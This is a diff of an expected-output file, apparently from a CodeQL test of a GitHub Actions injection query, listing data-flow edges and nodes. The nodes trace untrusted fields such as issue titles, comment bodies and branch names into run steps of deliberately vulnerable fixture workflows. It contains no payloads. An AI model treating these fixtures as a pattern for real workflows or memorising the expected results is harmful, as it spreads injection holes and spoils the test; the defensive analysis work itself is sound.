steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| 